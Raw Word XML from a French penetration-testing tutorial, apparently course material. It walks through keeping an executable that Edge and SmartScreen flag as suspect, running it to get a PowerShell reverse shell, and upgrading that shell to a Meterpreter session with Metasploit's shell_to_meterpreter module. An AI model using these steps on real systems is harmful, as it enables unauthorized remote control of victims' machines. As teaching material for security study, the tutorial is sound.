            <wp:extent cx="2278380" cy="3317875"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="79" name="Picture 79"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Graphical user interface, text, application, Word&#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78380" cy="3317875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Nous devons forcer la sécurité Edge de garder le fichier car il est détecté comme suspect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A9E500" w14:textId="679C8016" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F9DD388" wp14:editId="2FB1818F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-245110</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>77470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3429000" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="78" name="Picture 7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Graphical user interface, application&#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29000" cy="2773680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1E6F06" w14:textId="7CA26A72" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B85900" w14:textId="3A6B1B2D" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Une fois fait, nous voyons l’exécutable dans notre dossier téléchargement, et nous pouvons </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:t>l’</w:t>
      </w:r>
      <w:r w:rsidR="006619D7" w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exécut</w:t>
      </w:r>
      <w:r w:rsidR="00E43848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF04646" w14:textId="1A098F36" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497B00DF" wp14:editId="1B191982">
            <wp:extent cx="5759450" cy="2287905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80" name="Picture 8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Graphical user interface, text, application&#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9450" cy="2287905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DCD90" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB0940C" w14:textId="0671EF7B" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sécurité SmartScreen nous demande confirmation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D9C30" w14:textId="0B4EB25F" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768BD729" wp14:editId="3471C2E6">
            <wp:extent cx="5097780" cy="4785360"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="81" name="Picture 8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Graphical user interface, text, application&#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97780" cy="4785360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0FA2F" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D61F639" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC4A476" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4519D4E3" w14:textId="7D58EC8C" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc133586245"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="198E59FC" w14:textId="1448BA25" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Après cela, nous voyons sur notre handler que nous avons récupéré un </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur le compte utilisateur de la machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66158A30" w14:textId="1511E0B3" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69BB68A9" wp14:editId="6CB74E71">
            <wp:extent cx="5759450" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="82" name="Picture 8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Text&#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9450" cy="2872740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFD1CC" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256AF2C3" w14:textId="0915A185" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous passons la </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en arrière-plan avec </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ctrl + Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BC09C" w14:textId="77777777" w:rsidR="006619D7" w:rsidRDefault="006619D7" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C87969" w14:textId="0EA2630D" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avec la commande suivante nous pouvons voir les </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ouverte</w:t>
      </w:r>
      <w:r w:rsidR="00A0138A">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1642AE2D" w14:textId="16188C7F" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A567515" w14:textId="74800F58" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="355107EA" wp14:editId="5DA7C793">
            <wp:extent cx="5759450" cy="910590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="83" name="Picture 8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Graphical user interface, text&#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9450" cy="910590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6CC13" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D8A512" w14:textId="15BAD24C" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintenant le but est de faire évoluer notre </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vers un </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qui nous donnera plus d’option d’exploitation, pour cela nous </w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>recherchons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B0FCCF" w14:textId="1CFE88DC" w:rsidR="005476B6" w:rsidRDefault="006619D7" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005476B6">
        <w:t>earch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005476B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005476B6">
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B447700" w14:textId="125123AD" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="072E0CCA" wp14:editId="48EF6654">
            <wp:extent cx="5759450" cy="1640205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84" name="Picture 8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screenshot of a computer&#10;&#10;Description automatically generated with medium confiden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9450" cy="1640205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1846B6" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F34113B" w14:textId="28698278" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nous avons notre résultat donc nous pouvons faire </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EBDE01" w14:textId="4A9FC126" w:rsidR="005476B6" w:rsidRDefault="006619D7" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="005476B6">
        <w:t>se 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C616082" w14:textId="3425BC5D" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44D77716" wp14:editId="2E774A75">
            <wp:extent cx="4099560" cy="594360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85" name="Picture 8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Text&#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99560" cy="594360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDB9C4" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75554E1D" w14:textId="7EAEBCAC" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comme pour notre autre exploit, nous affichons les options avec </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A0E02" w14:textId="15BD24C0" w:rsidR="005476B6" w:rsidRDefault="006619D7" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005476B6">
        <w:t>how options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE1B4F" w14:textId="546C11E4" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E38588" wp14:editId="18FFD738">
            <wp:extent cx="5759450" cy="1205230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="Picture 8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9450" cy="1205230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A63377" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04502E2F" w14:textId="6BA30D43" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous paramétrons le </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avec les informations correspondants a notre cas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B0164" w14:textId="494D12E6" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans le paramètre </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> il faut mettre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>l’id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de session que nous pouvons voir avec la commande </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> précédente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E0639" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFE290A" w14:textId="18C4C9E3" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Et nous pouvons faire </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5555D" w14:textId="5F275057" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D7254" w14:textId="26345329" w:rsidR="007059DA" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC779B0" wp14:editId="61ABA81F">
            <wp:extent cx="5759450" cy="1230630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="87" name="Picture 87" descr="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Text, website&#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9450" cy="1230630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F4E3B" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EB1867" w14:textId="55213FB1" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>A la fin si tous c’est bien déroulé, nous pouvons refaire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7B7E0" w14:textId="78EBAAEE" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7BBBA" w14:textId="0D96F5B4" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Et nous pouvons voir qu’une nouvelle session c’est </w:t>
      </w:r>
      <w:r w:rsidR="006619D7" w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ouvert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avec le type </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F26DC" w14:textId="11837DB9" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FFBA855" wp14:editId="458B2D35">
            <wp:extent cx="5759450" cy="833755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="88" name="Picture 8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Graphical user interface, text&#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9450" cy="833755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C33A19" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCCF709" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B53B0F" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B0254F" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6169FB" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAF6A6D" w14:textId="4FAF2073" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Nous pouvons donc entrer dans cette session avec la commande </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A32BD4" w14:textId="282F99F0" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Sessions -i id de session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B82E4" w14:textId="265A4254" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="580520AD" wp14:editId="60D67310">
            <wp:extent cx="4831080" cy="792480"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="90" name="Picture 9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Text&#10;&#10;Description automatically generated with medium confid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31080" cy="792480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C27BE1" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EB5D5E" w14:textId="30E337E3" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Pour avoir la liste de toutes les commandes meterpreter possible avec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B995C1" w14:textId="3FE197E5" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>help</w:t>
      </w:r>
    </w:p>
